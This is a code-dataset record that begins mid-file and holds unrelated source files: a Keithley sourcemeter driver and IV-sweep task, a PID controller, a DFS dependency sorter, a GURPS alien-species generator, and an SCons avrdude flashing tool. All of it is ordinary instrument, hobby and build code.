self.inst.write(":SOURce:VOLTage:STARt %.6f" % start)
self.inst.write(":SOURce:VOLTage:STOP %.6f" % stop)
self.inst.write(":SOURce:VOLTage:STEP %.6f" % step)
self.inst.write(":TRIG:COUN %d" % Npoints) # Set to perform N measurements.
elif mode == 'list':
self.inst.write(":SOURce:VOLTage:MODE LIST")
Npoints = len(sweep_list)
t = ''
for value in sweep_list:
t += f'{value:.4f},'
t = t[0:-1]
self.inst.write(":SOURce:LIST:VOLTage %s" % t)
self.inst.write(":TRIG:COUN %d" % Npoints)
if (delay == 'AUTO') | (delay == 'auto'):
self.inst.write(":SOURce:DELay:AUTO ON")
self.sweep_total_time = (0.005 + nplc /50 + 0.05) * Npoints
else:
self.inst.write(":SOURce:DELay %.6f" % delay)
self.sweep_total_time = (delay + nplc /50 + 0.05) * Npoints
self.inst.write(":SOURce:SwEep:RANging BEST")
self.inst.write(":SENSe:FUNC 'CURR:DC'")
self.inst.write(":SENSe:CURR:NPLC %.3f" % nplc) # Set measurement speed to 1 PLC.
self.inst.write(":SENSe:CURR:PROT:LEV %.3g" % cmpl)
if (ranging != 'AUTO') & (ranging != 'auto'):
if ranging >= cmpl:
print('INFO: The compliance is increased to match the SENSe range')
self.inst.write(":SENSe:CURR:PROT:LEV %.3g" % ranging)
self.inst.write(":SENSe:CURRent:RANGe %.6e" % ranging)
def sweep_read(self, delay = None):
"""
Launches the configured sweep using the method mode_Isweep_config.
Parameters:
----------
delay: int or float
Delay time in secodn between the write and read of the query, the default is taken from the estimated time to perform the sweep, stored in the property self.sweep_total_time.
Returns:
--------
data: np.array
Array contain the output from the sourcemeter, N x 5, where N is the number of points taken. The first two columns are the voltage and current, respectively.
"""
self.outpon()
if delay == None:
delay = self.sweep_total_time
data = self.inst.query_ascii_values("READ?", delay = delay, container = array)
# Reshaping the data to a Npoints x columns array
data = data.reshape((data.shape[0] // 5, 5))
return data
```
#### File: pyInstruments/ivsweep/tasks.py
```python
import numpy as np
from pyInstruments.instruments import keithley24XX # This the module I created
import datetime
from pathlib import Path
class IVSweeperTask(object):
def __init__(self, resource = None, folder = '.\\', filename = 'voltsge-sweep',\
start = 0, stop = 1, step = 0.1, mode = 'step', sweep_list = [],\
term = 'FRONT', cmpl = 0.1, delay = 0.1, ranging = 'AUTO', nplc = 1, spacing = 'LIN'):
"""
Parameters
----------
resource : str, optional
The resource name for the sourcemeter Keithley24XX, default is 'GPIfc00:e968:6179::de52:7100::INSTR'. The default is 'GPIfc00:e968:6179::de52:7100::INSTR'.
folder : str, optional
Folder where to save the data, abs o relative. The default is '.\'.
filename : bool, optional
Filename where to save the data. Always append if the file already exists. The default is 'voltage-time-data'.
start: int ot float
Initial voltage in V in case of a stair-like sweep.
stop: int ot float
Final voltage in V in case of a stair-like sweep.
step: int ot float
Voltage step in V in case of a stair-like sweep.
mode: 'step' or 'list'
Sweep mode. If 'step' the values start, stop, step and spacing are used to configure the sweep-list values. If 'list' the list passed to the 'sweep_list' argument will be used. The default is 'step'.
term: 'FRONT' ot 'REAR'
The output terminal to use. the default is 'FRONT'
cmpl: itn or float
The compliance value in A.
nplc: int or float 0.01 <= nplc <=100
Numebr of pulse light cycles to average the data. The default is 1.
ranging: 'AUTO' or float
Set the current sensign range to a fix one in the case a value is passed. The default is None and the sourcemeter will adjust the range according to the measured values.
spacing:'LIN' or 'LOG'
Spacing type of the values in the case of a stair-like sweep.
delay: int or float
Specify delay in seconds between the settled source value and the measurement reading.
Returns
-------
None.
"""
self.max_length = 500
self.time = []
self.voltage = []
self.intensity = []
self.resource = resource
self.folder = Path(folder)
self.filename = filename
self.configuration = dict(start = start, stop = stop, step = step, mode = mode, sweep_list = sweep_list,\
term = term, cmpl = cmpl, delay = delay, ranging = ranging, nplc = nplc, spacing = spacing)
self.data_ready = False
def start_instrument(self):
"""
Powers on the instrument.
"""
# Opening the resource only done if not done before
if self.resource is None:
raise ValueError('The sourcemeter resource has not been defined. Please define it throught the resource attribute')
self.keithley = keithley24XX(self.resource)
self.keithley.mode_Vsweep_config(**self.configuration)
def run(self):
"""
Engages the sweep.
"""
############ LOGGING THE DATA ###################################
# Opening the file to save the data
filename = Path(self.folder) / (self.filename + '.txt')
if not filename.exists():
with open(filename,'a') as f:
f.write(('# ' + 3*'{:^12}\t' + '\n').format('Voltage(V)','Current(A)', 'Time(s)'))
timestamp = datetime.datetime.now().strftime("%Y-%m-%dT%H:%M:%S.%f")
data = self.keithley.sweep_read()
with open(filename,'a') as f:
f.write('# {}\n'.format(timestamp))
f.write('# Delay between steps: {}\n'.format(self.configuration['delay']))
np.savetxt(f, data[:,[0,1,3]], fmt = '%.6f')
self.voltage = data[:,0]
self.intensity = data[:,1]
self.time = data[:,3]
self.data_ready = True
```
#### File: pyInstruments/pid/pid_class.py
```python
from time import time
class Pid(object):
def __init__(self, Kp, Ki, Kd, ulimit = 0.020, llimit = 3.5e-5):
"""Initalize all values for the PID"""
# Values of the pid
self.Kp = Kp
self.Ki = Ki
self.Kd = Kd
self.ti = 0.0
self.td = 0.0
self.dt = 0.0
# Check for the first call
self.first_call = True
# Setpoint and value
self.setpoint = 0.0
self.value = 0.0
# Limits of the action provided by the user
self.set_ulimit(ulimit)
self.set_llimit(llimit)
def set_ulimit(self, limit):
"""This method sets the maximum value of the action of PID"""
self.ulimit = limit
print("The action maximum value will be limited to {:.2g}".format(self.ulimit))
def set_llimit(self, limit):
"""This method sets the minimum value of the action of PID"""
self.llimit = limit
print("The action minimum value will be limited to {:.2g}".format(self.llimit))
def set_setpoint(self,setpoint):
"""This method sets the setpoint value of the PID"""
self.setpoint = setpoint
def update(self, value, setpoint = None):
"""This function updates the value of the action. It needs the reference current value of the control\
variable. It No setpoint is provided, the setpoint is taken from the attribute self.setpoint"""
if setpoint is not None:
self.setpoint = setpoint
if self.first_call:
self.prev_time = time()
self.first_call = False
# Update all the values
self.dt = time() - self.prev_time
self.value = value
error = self.setpoint - self.value
pi = self.Kp * error
ti = self.Ki * error * self.dt
if self.dt > 0:
td = self.Kd * error / self.dt
else:
td = 0
action = pi + (self.ti + ti) + td - self.td
if self.llimit < action < self.ulimit:
self.ti = self.ti + ti
self.td = td -self.td
elif action > self.ulimit:
action = self.ulimit
else:
action = self.llimit
self.prev_time = time()
return action
def clear(self):
"""Clears and resets the PID to the initial values of the integrative and derivative factors"""
self.ti = 0.0
self.td = 0.0
self.dt = 0.0
self.first_call = True
``` |
{
"source": "j-raghavan/Dfs",
"score": 4
} |
#### File: j-raghavan/Dfs/dfs.py
```python
from collections import defaultdict
def sort_dependencies(dependencies):
result = []
visited = set([])
visiting = set([])
def dfs(node):
if node in visited:
return
visiting.add(node)
for neighbor in dependencies[node]:
if neighbor in visiting:
raise Exception('Cycle Dependency Found')
if neighbor not in visited:
dfs(neighbor)
visiting.remove(node)
visited.add(node)
result.append(node)
for node in dependencies.keys():
dfs(node)
print(result)
if __name__ == '__main__':
depDict = {
0: [],
1: [0],
2: [0],
3: [1,2],
4: [3],
5: [1,2],
6: [5],
7: [3,4,5,6],
8: [12],
9: [0,3],
10: [2],
11: [10],
12: [10,11]
}
sort_dependencies(depDict)
``` |
{
"source": "JRahilly/GURPS_Scripts",
"score": 3
} |
#### File: JRahilly/GURPS_Scripts/Alien.py
```python
import Functions as F
import os
# *** Classes *** #
class Alien(): # Defines a new alien species
# *** Global Class Vars *** #
alienNum = 1
# *** Class Functions *** #
def __init__(self):
# *** Self Attributes *** #
self.name = 'SID#{}'.format(Alien.alienNum)
self.chemicalBasis = Alien.chemicalBasis(self)
self.dwelling, self.habitat = Alien.habitat(self)
self.sapience = Alien.sapience(self)
self.trophicLevel = Alien.trophicLevel(self, 0)
self.primaryLocomotion, self.secondaryLocomotion, self.tertiaryLocomotion = Alien.locomotion(self)
self.sizeClass, self.size, self.weight, self.sizeMod, self.strength, self.gravity = Alien.size(self)
# self.symmetry, self.limbs, self.tails, self.manipulators, self.skeleton = Alien.body(self)
# *** Class Var Increments *** #
Alien.alienNum += 1
def attributes(self):
print(self.name)
print('---- Biology ----')
print('Chemical Basis : {}'.format(self.chemicalBasis))
print('Dwelling : {}'.format(self.dwelling))
print('Habitat : {}'.format(self.habitat))
print('Sapience : {}'.format(self.sapience))
print('Trophic Level : {}'.format(self.trophicLevel))
print('---- Locomotion ----')
print('Primary Locomotion : {}'.format(self.primaryLocomotion))
if self.secondaryLocomotion != None:
print('Secondary Locomotion : {}'.format(self.secondaryLocomotion))
if self.tertiaryLocomotion != None:
print('Tertiary Locomotion : {}'.format(self.tertiaryLocomotion))
print('---- Size ----')
print('Size Class : {}'.format(self.sizeClass))
print('Longest Dimension : {}'.format(self.size))
print('Average Earth Weight : {}'.format(self.weight))
print('Native Gravity : {}'.format(self.gravity))
print('Average Native Weight: {:.2f}'.format(self.weight * self.gravity))
print('Size Modifier : {}'.format(self.sizeMod))
print('Average Strength : {}'.format(self.strength))
# print('---- Body ----')
# print('Body Symmetry : {}'.format(self.symmetry))
# print('Limb Count : {}'.format(self.limbs))
# print('Tail Count : {}'.format(self.tails))
# print('Manipulator Count : {}'.format(self.manipulators))
# print('Skeleton Type : {}'.format(self.skeleton))
def body(self):
# *** Tables *** #
table = {
'Symmetry' : {
2 : 'Bilateral',
3 : 'Bilateral',
4 : 'Bilateral',
5 : 'Bilateral',
6 : 'Bilateral',
7 : 'Bilateral',
8 : 'Trilateral',
9 : 'Radial',
10 : 'Spherical',
11 : 'Asymmetric',
12 : 'Asymmetric',
13 : 'Asymmetric',
14 : 'Asymmetric'},
'Limbs' : {
1 : 'Limbless',
2 : 'One Segment (One Limb per Side)',
3 : 'Two Segments (Two Limbs per Side)',
4 : 'Segments (Each Segment has One Limb per Side)',
5 : 'Segments (Each Segment has One Limb per Side)',
6 : 'Segments (Each Segment has One Limb per Side)'},
'Tails' : {
2 : 'No Features',
3 : 'No Features',
4 : 'No Features',
5 : 'No Features',
6 : 'Striker Tail',
7 : 'Long Tail',
8 : 'Constricting Tail',
9 : 'Barbed Striker Tail',
10 : 'Gripping Tail',
11 : 'Branching Tail',
12 : 'Combination'},
'Manipulators' : {
6 : 'No Manipulators',
7 : '1 Set of Manipulators with Bad Grip',
8 : 'Prehensile Tail of Trunk',
9 : '1 Set of Manipulators with Normal DX',
10 : '2 Sets of Manipulators',
11 : 'Sets of Manipulators',
12 : 'Sets of Manipulators',
13 : 'Sets of Manipulators',
14 : 'Sets of Manipulators',
15 : 'Sets of Manipulators',
16 : 'Sets of Manipulators',
17 : 'Sets of Manipulators'},
'Skeleton' : {
3 : 'No Skeleton',
4 : 'Hydrostatic Skeleton',
5 : 'Hydrostatic Skeleton',
6 : 'External Skeleton',
7 : 'External Skeleton',
8 : 'Internal Skeleton',
9 : 'Internal Skeleton',
10 : 'Internal Skeleton',
11 : 'Combination',
12 : 'Combination',
13 : 'Combination',
14 : 'Combination',
15 : 'Combination',
16 : 'Combination'},
'Spherical' : {
1 : '4 Sides',
2 : '6 Sides',
3 : '6 Sides',
4 : '8 Sides',
5 : '12 Sides',
6 : '20 Sides'}}
# *** Dice Roller *** #
rollA = F.rollDice(6, 2)
rollB = F.rollDice(6, 1)
rollC = F.rollDice(6, 1)
rollD = F.rollDice(6, 2)
rollE = F.rollDice(6, 2)
rollF = F.rollDice(6, 2)
# *** Symmetry *** #
if self.habitat == 'Space-Dwelling' or self.primaryLocomotion == 'Immobile':
rollA += 1
symmetry = table['Symmetry'][rollA]
else:
symmetry = table['Symmetry'][rollA]
if symmetry == 'Radial':
symmetry += ' {} Sides'.format(rollDice(6, 1) + 3)
rollC -= 2
elif symmetry == 'Spherical':
symmetry += ' {}'.format(table['Symmetry'][rollB])
elif symmetry == 'Trilateral':
rollC -= 1
# *** Limbs *** #
def chemicalBasis(self):
# *** Table **** #
table = {
3 : 'Hydrogen-Based Life',
4 : 'Hydrogen-Based Life',
5 : 'Hydrogen-Based Life',
6 : 'Ammonia-Based Life',
7 : 'Ammonia-Based Life',
8 : 'Hydrocarbon-Based Life',
9 : 'Water-Based Life',
10 : 'Water-Based Life',
11 : 'Water-Based Life',
12 : 'Chlorine-Based Life',
13 : 'Silicon/Sulfuric Acid Life',
14 : 'Silicon/Liquid Sulfur Life',
15 : 'Silicon/Liquid Rock Life',
16 : 'Plasma Life',
17 : 'Exotica',
18 : 'Exotica'}
# *** Dice Roller *** #
rollA = F.rollDice(6, 3)
rollB = F.rollDice(6, 1)
chemicalBasis = table[rollA]
# *** Edge Case *** #
if chemicalBasis == 'Exotica':
if rollB == 1:
chemicalBasis = 'Nebula-Dwelling Life'
elif rollB == 6:
chemicalBasis = 'Magnetic Life'
else:
chemicalBasis = 'Machine Life'
return chemicalBasis
def habitat(self):
# *** Tables *** #
landHab = {
3 : 'Plains',
4 : 'Plains',
5 : 'Plains',
6 : 'Plains',
7 : 'Plains',
8 : 'Desert',
9 : 'Island/Beach',
10 : 'Woodlands',
11 : 'Swampland',
12 : 'Mountain',
13 : 'Artic',
14 : 'Jungle',
15 : 'Jungle',
16 : 'Jungle',
17 : 'Jungle',
18 : 'Jungle'}
waterHab = {
3 : 'Banks',
4 : 'Banks',
5 : 'Banks',
6 : 'Banks',
7 : 'Banks',
8 : 'Open Ocean',
9 : 'Fresh-Water Lake',
10 : 'River/Stream',
11 : 'Tropical Lagoon',
12 : 'Deep-Ocean Vents',
13 : 'Salt-Water Sea',
14 : 'Reef',
15 : 'Reef',
16 : 'Reef',
17 : 'Reef',
18 : 'Reef'}
# *** Dice Roller *** #
rollA = F.rollDice(6, 1)
rollB = F.rollDice(6, 1)
rollC = F.rollDice(6, 3)
# *** Planetary or Space Based *** #
dwelling = ''
habitat = ''
if self.chemicalBasis == 'Nebula-Dwelling Life':
dwelling = 'Nebula'
habitat = 'Space-Dwelling'
elif rollA >= 5:
dwelling = 'Gas Giant'
habitat = waterHab[rollC]
else:
if rollB <= 3:
dwelling = 'Land'
habitat = landHab[rollC]
else:
dwelling = 'Water'
habitat = waterHab[rollC]
return dwelling, habitat
def locomotion(self):
# *** Table *** #
primary = {
'Artic' : {
2 : 'Immobile',
3 : 'Slithering',
4 : 'Slithering',
5 : 'Swimming',
6 : 'Swimming',
7 : 'Digging',
8 : 'Walking',
9 : 'Walking',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Banks' : {
2 : 'Immobile',
3 : 'Immobile',
4 : 'Floating',
5 : 'Sailing',
6 : 'Swimming',
7 : 'Swimming',
8 : 'Swimming',
9 : 'Winged Flight',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Open Ocean' : {
2 : 'Immobile',
3 : 'Immobile',
4 : 'Floating',
5 : 'Sailing',
6 : 'Swimming',
7 : 'Swimming',
8 : 'Swimming',
9 : 'Winged Flight',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Deep-Ocean Vents' : {
2 : 'Immobile',
3 : 'Immobile',
4 : 'Immobile',
5 : 'Immobile',
6 : 'Floating',
7 : 'Digging',
8 : 'Walking',
9 : 'Walking',
10 : 'Swimming',
11 : 'Swimming',
12 : 'Swimming',
13 : 'Swimming'},
'Reef' : {
2 : 'Immobile',
3 : 'Immobile',
4 : 'Immobile',
5 : 'Immobile',
6 : 'Floating',
7 : 'Digging',
8 : 'Walking',
9 : 'Walking',
10 : 'Swimming',
11 : 'Swimming',
12 : 'Swimming',
13 : 'Swimming'},
'Desert' : {
2 : 'Immobile',
3 : 'Slithering',
4 : 'Slithering',
5 : 'Digging',
6 : 'Walking',
7 : 'Walking',
8 : 'Walking',
9 : 'Winged Flight',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Island/Beach' : {
2 : 'Immobile',
3 : 'Slithering',
4 : 'Slithering',
5 : 'Digging',
6 : 'Walking',
7 : 'Walking',
8 : 'Climbing',
9 : 'Swimming',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Tropical Lagoon' : {
2 : 'Immobile',
3 : 'Immobile',
4 : 'Immobile',
5 : 'Floating',
6 : 'Slithering',
7 : 'Walking',
8 : 'Digging',
9 : 'Swimming',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Fresh-Water Lake' : {
2 : 'Immobile',
3 : 'Immobile',
4 : 'Floating',
5 : 'Walking',
6 : 'Slithering',
7 : 'Swimming',
8 : 'Swimming',
9 : 'Swimming',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Salt-Water Sea' : {
2 : 'Immobile',
3 : 'Immobile',
4 : 'Floating',
5 : 'Walking',
6 : 'Slithering',
7 : 'Swimming',
8 : 'Swimming',
9 : 'Swimming',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Mountain' : {
2 : 'Immobile',
3 : 'Slithering',
4 : 'Slithering',
5 : 'Digging',
6 : 'Walking',
7 : 'Walking',
8 : 'Climbing',
9 : 'Winged Flight',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Plains' : {
2 : 'Immobile',
3 : 'Slithering',
4 : 'Slithering',
5 : 'Digging',
6 : 'Walking',
7 : 'Walking',
8 : 'Walking',
9 : 'Winged Flight',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'River/Stream' : {
2 : 'Immobile',
3 : 'Immobile',
4 : 'Floating',
5 : 'Slithering',
6 : 'Digging',
7 : 'Walking',
8 : 'Swimming',
9 : 'Swimming',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Swampland' : {
2 : 'Immobile',
3 : 'Swimming',
4 : 'Swimming',
5 : 'Swimming',
6 : 'Slithering',
7 : 'Digging',
8 : 'Walking',
9 : 'Climbing',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Woodlands' : {
2 : 'Immobile',
3 : 'Slithering',
4 : 'Slithering',
5 : 'Digging',
6 : 'Walking',
7 : 'Walking',
8 : 'Climbing',
9 : 'Climbing',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Jungle' : {
2 : 'Immobile',
3 : 'Slithering',
4 : 'Slithering',
5 : 'Digging',
6 : 'Walking',
7 : 'Walking',
8 : 'Climbing',
9 : 'Climbing',
10 : 'Winged Flight',
11 : 'Winged Flight',
12 : 'Special',
13 : 'Special'},
'Space-Dwelling' : {
2 : 'Immobile',
3 : 'Immobile',
4 : 'Immobile',
5 : 'Immobile',
6 : 'Immobile',
7 : 'Solar Sail',
8 : 'Solar Sail',
9 : 'Solar Sail',
10 : 'Solar Sail',
11 : 'Solar Sail',
12 : 'Rocket',
13 : 'Rocket'}}
secondary = {
'Climbing' : {
2 : 'Slithering',
3 : 'Slithering',
4 : 'Slithering',
5 : 'Slithering',
6 : 'Slithering',
7 : 'Walking',
8 : 'Walking',
9 : 'Walking',
10 : 'Walking',
11 : 'Walking',
12 : None},
'Digging' : {
'Land' : {
2 : 'Slithering',
3 : 'Slithering',
4 : 'Slithering',
5 : 'Slithering',
6 : 'Slithering',
7 : 'Walking',
8 : 'Walking',
9 : 'Walking',
10 : 'Walking',
11 : 'Walking',
12 : None},
'Water' : {
2 : 'Slithering',
3 : 'Slithering',
4 : 'Slithering',
5 : 'Slithering',
6 : 'Walking',
7 : 'Walking',
8 : 'Swimming',
9 : 'Swimming',
10 : 'Swimming',
11 : 'Swimming',
12 : None}},
'Slithering' : {
2 : 'Swimming',
3 : 'Swimming',
4 : 'Swimming',
5 : 'Swimming',
6 : 'Swimming',
7 : 'Swimming',
8 : 'Swimming',
9 : 'Swimming',
10 : 'Swimming',
11 : None,
12 : None},
'Swimming' : {
2 : 'Slithering',
3 : 'Slithering',
4 : 'Slithering',
5 : 'Slithering',
6 : 'Slithering',
7 : 'Walking',
8 : 'Walking',
9 : 'Walking',
10 : None,
11 : None,
12 : None},
'Walking' : {
2 : 'Swimming',
3 : 'Swimming',
4 : 'Swimming',
5 : 'Swimming',
6 : 'Swimming',
7 : 'Swimming',
8 : 'Swimming',
9 : None,
10 : None,
11 : None,
12 : None},
'Winged Flight' : {
2 : 'Climbing',
3 : 'Climbing',
4 : 'Climbing',
5 : 'Climbing',
6 : 'Swimming',
7 : 'Swimming',
8 : 'Walking',
9 : 'Walking',
10 : 'Walking',
11 : 'Slithering',
12 : None}}
# *** Dice Roller *** #
rollA = F.rollDice(6, 2)
rollB = F.rollDice(6, 2)
rollC = F.rollDice(6, 2)
# *** Modifiers *** #
if self.trophicLevel == 'Pouncing Carnivore' or 'Chasing Carnivore' or 'Omnivore' or 'Gathering Herbivore' or 'Scavenger':
rollA += 1
# *** Primary *** #
primaryL = primary[self.habitat][rollA]
secondaryL = None
tertiaryL = None
# *** Secondary *** #
try:
if primaryL == 'Digging':
secondaryL = secondary[primaryL][self.dwelling][rollB]
else:
secondaryL = secondary[primaryL][rollB]
except:
secondaryL = None
# *** Tertiary *** #
try:
if primaryL == 'Digging':
if self.habitat == 'Water':
if secondaryL == 'Slithering' or 'Walking':
tertiaryL = secondary[secondaryL][rollC]
elif primaryL == 'Winged Flight':
if secondaryL == 'Climbing' or 'Swimming' or 'Slithering':
tertiaryL = secondary[secondaryL][rollC]
except:
tertiaryL = None
return primaryL, secondaryL, tertiaryL
def sapience(self):
# *** Dice Roller *** #
roll = F.rollDice(100, 1)
# *** Sapience *** #
sapience = ''
if roll > 95:
sapience = 'Sapient'
else:
sapience = 'Ordinary'
return sapience
def size(self):
# *** Tables *** #
table = {
'Small' : {
1 : [0.05, 0.003, -10],
2 : [0.07, 0.01, -9],
3 : [0.1, 0.025, -8],
4 : [0.15, 0.08, -7],
5 : [0.2, 0.2, -6],
6 : [0.3, 1, -5]},
'Human' : {
1 : [0.5, 4, -4],
2 : [0.7, 9, -3],
3 : [1, 25, -2],
4 : [1.5, 80, -1],
5 : [2, 200, 0],
6 : [3, 600, 1]},
'Large' : {
1 : [5, 3000, 2],
2 : [7, 8000, 3],
3 : [10, 24000, 4],
4 : [15, 80000, 5],
5 : [20, 200000, 6],
6 : [F.rollDice(6, 2) * 10, 200000, 7]},
'Gravity' : {
3 : [5.00, 0.30],
4 : [3.50, 0.40],
5 : [2.50, 0.50],
6 : [2.00, 0.60],
7 : [1.50, 0.75],
8 : [1.25, 0.90],
9 : [1.00, 1.00],
10 : [0.90, 1.10],
11 : [0.80, 1.20],
12 : [0.70, 1.30],
13 : [0.60, 1.40],
14 : [0.50, 1.60],
15 : [0.40, 1.80],
16 : [0.30, 2.20],
17 : [0.20, 2.90],
18 : [0.10, 4.60]}}
# *** Dice Roller *** #
rollA = F.rollDice(6, 1)
rollB = F.rollDice(6, 1)
rollC = F.rollDice(6, 3)
# *** Modifiers Size Class *** #
gravity = table['Gravity'][rollC][0]
if self.chemicalBasis == 'Magnetic Life':
rollA -= 4
if 'Parasite/Symbiont' in self.trophicLevel:
rollA -= 4
if self.primaryLocomotion == 'Winged Flight':
rollA -= 3
if gravity > 2:
rollA -= 2
if 1.5 <= gravity <= 2:
rollA -= 1
if self.habitat == 'Tropical Lagoon':
rollA -= 1
if self.habitat == 'River/Stream':
rollA -= 1
if self.habitat == 'Island/Beach':
rollA -= 1
if self.habitat == 'Desert':
rollA -= 1
if self.habitat == 'Mountain':
rollA -= 1
if 0.5 <= gravity <= 0.75:
rollA += 1
if self.habitat == 'Plains':
rollA += 1
if self.habitat == 'Open Ocean':
rollA += 1
if self.habitat == 'Banks':
rollA += 1
if self.trophicLevel == 'Grazing Herbivore':
rollA += 1
if self.dwelling == 'Water':
rollA += 1
if gravity <= 0.4:
rollA +=2
if self.habitat == 'Space-Dwelling':
rollA += 3
# *** Size Class *** #
if rollA <= 2:
sizeClass = 'Small'
elif rollA >= 5:
sizeClass = 'Large'
else:
sizeClass = 'Human'
# *** Size | Weight | Modifier
size = table[sizeClass][rollB][0]
weight = table[sizeClass][rollB][1]
sizeMod = table[sizeClass][rollB][2]
# *** Size | Weight | Size Mod | Modifiers *** #
if 'Silicon' in self.chemicalBasis:
weight *= 2
if self.chemicalBasis == 'Magnetic Life':
size /= 1000
if self.chemicalBasis == 'Hydrogen-Based Life' or self.chemicalBasis == 'Plasma Life':
weight /= 10
if self.habitat == 'Space-Dwelling':
weight /= 5
# *** Randomize Weight *** #
start, stop = weight / 2, weight * 2
if start != 0:
weight = F.randWeight(start, stop)
weight = float('{:.2f}'.format(weight))
# *** Strength *** #
strength = 2 * (weight ** (1.0/3.0))
strength = round(strength)
return sizeClass, size, weight, sizeMod, strength, gravity
def trophicLevel(self, loop):
# *** Tables *** #
ordinary = {
3 : 'Combined',
4 : 'Autotroph',
5 : 'Decomposer',
6 : 'Scavenger',
7 : 'Omnivore',
8 : 'Gathering Herbivore',
9 : 'Gathering Herbivore',
10 : 'Grazing/Browsing Herbivore',
11 : 'Grazing/Browsing Herbivore',
12 : 'Pouncing Carnivore',
13 : 'Chasing Carnivore',
14 : 'Trapping Carnivore',
15 : 'Hijacking Carnivore',
16 : 'Filter-Feeder',
17 : 'Parasite/Symbiont',
18 : 'Parasite/Symbiont'}
sapient = {
3 : 'Combined',
4 : 'Parasite/Symbiont',
5 : 'Filter-Feeder',
6 : 'Pouncing Carnivore',
7 : 'Scavenger',
8 : 'Gathering Herbivore',
9 : 'Gathering Herbivore',
10 : 'Omnivore',
11 : 'Chasing Carnivore',
12 : 'Chasing Carnivore',
13 : 'Grazing Herbivore',
14 : 'Hijacking Carnivore',
15 : 'Trapping Carnivore',
16 : 'Trapping Carnivore',
17 : 'Decomposer',
18 : 'Autotroph'}
autotroph = {
1 : 'Photosynthesis',
2 : 'Photosynthesis',
3 : 'Photosynthesis',
4 : 'Chemosynthesis',
5 : 'Chemosynthesis',
6 : 'Other'}
# *** Dice Roller *** #
rollA = F.rollDice(6, 3)
rollB = F.rollDice(3, 1)
rollC = F.rollDice(6, 1)
# *** Trophic Level *** #
trophicLevel = ''
if self.sapience == 'Sapient':
trophicLevel = sapient[rollA]
else:
trophicLevel = ordinary[rollA]
# *** Edge Cases *** #
if trophicLevel == 'Autotroph':
if self.habitat == 'Deep-Ocean Vents':
trophicLevel += ': {}'.format(autotroph[3 + rollB])
else:
trophicLevel += ': {}'.format(autotroph[rollC])
if trophicLevel == 'Filter Feeder':
if self.habitat == 'Artic' or 'Desert':
trophicLevel = 'Trapping Carnivore'
if trophicLevel == 'Combined':
if loop == 0:
trophicLevelA = Alien.trophicLevel(self, 1)
trophicLevelB = Alien.trophicLevel(self, 1)
trophicLevel += ': {} | {}'.format(trophicLevelA, trophicLevelB)
else:
trophicLevel = Alien.trophicLevel(self, 1)
return trophicLevel
# *** Functions *** #
def main():
entries = 1000
counter = 0
print('Starting Alien Creation...')
for i in range(1, entries + 1, 1):
alien = Alien()
if alien.chemicalBasis == 'Machine Life':
alien.attributes()
print('\n')
print('Finished Alien Creation...')
print('{} Entries Created...'.format(entries))
# print('{} Entries with Strength >= 100'.format(counter))
# print('{} Percent of Total Entries'.format(counter / entries * 100))
# *** Main *** #
if __name__ == '__main__':
main()
``` |
{
"source": "jrahlf/3D-Non-Contact-Laser-Profilometer",
"score": 2
} |
#### File: scons/site_tools/avrdude.py
```python
import platform
from SCons.Script import *
# -----------------------------------------------------------------------------
def avrdude_flash(env, source, eeprom_source='', alias='avrdude_program'):
actionString = '$AVRDUDE -p $AVR_DEVICE -c $AVRDUDE_PROGRAMMER -P $AVRDUDE_PORT $AVRDUDE_OPTIONS -U flash:w:'
if platform.system() == "Windows":
# avrdude on Windows has problems with absolute path names.
# The leading drive letter plus colon backslash (e.g. "c:\path")
# gets confused with the colon used as argument separator.
#
# To avoid this problem we try to use relative path names if
# possible.
filename = str(source[0])
if os.path.isabs(filename):
filename = os.path.relpath(filename)
filename = filename.replace("\\", "/")
actionString += filename
if (eeprom_source != ''):
filename = str(eeprom_source[0])
if os.path.isabs(filename):
filename = os.path.relpath(filename)
filename = filename.replace("\\", "/")
actionString += "-U eeprom:w:" + filename
if env.get('AVRDUDE_BAUDRATE') != []:
actionString += " -b $AVRDUDE_BAUDRATE"
action = Action(actionString, cmdstr="$AVRDUDE_COMSTR")
return env.AlwaysBuild(env.Alias(alias, source, action))
else:
actionString += "$SOURCE"
if (eeprom_source != ''):
actionString += " -U eeprom:w:" + str(eeprom_source[0])
if env.get('AVRDUDE_BAUDRATE') != []:
actionString += " -b $AVRDUDE_BAUDRATE"
action = Action(actionString, cmdstr="$AVRDUDE_COMSTR")
return env.AlwaysBuild(env.Alias(alias, source, action))
def avrdude_fuse(env, alias='avrdude_fuse'):
fusebits = []
for fusebit in env['AVR_FUSEBITS']:
key, value = fusebit.items()[0]
fusebits.append("-U %s:w:0x%02x:m" % (key, int(value, 0)))
actionString = "$AVRDUDE -p $AVR_DEVICE -c $AVRDUDE_PROGRAMMER -P $AVRDUDE_PORT $AVRDUDE_OPTIONS -u %s" % " ".join(fusebits)
if env.get('AVRDUDE_BAUDRATE') != []:
actionString += " -b $AVRDUDE_BAUDRATE"
action = Action(actionString,
cmdstr="$AVRDUDE_FUSECOMSTR")
return env.AlwaysBuild(env.Alias(alias, [], action))
# -----------------------------------------------------------------------------
def generate(env, **kw):
# build messages
if ARGUMENTS.get('verbose') != '1':
env['AVRDUDE_COMSTR'] = "avrdude: program $SOURCE"
env['AVRDUDE_FUSECOMSTR'] = "avrdude: set fusebits"
env['AVRDUDE'] = 'avrdude'
env.AddMethod(avrdude_flash, 'Avrdude')
env.AddMethod(avrdude_fuse, 'AvrdudeFuses')
def exists(env):
return env.Detect('avrdude')
```
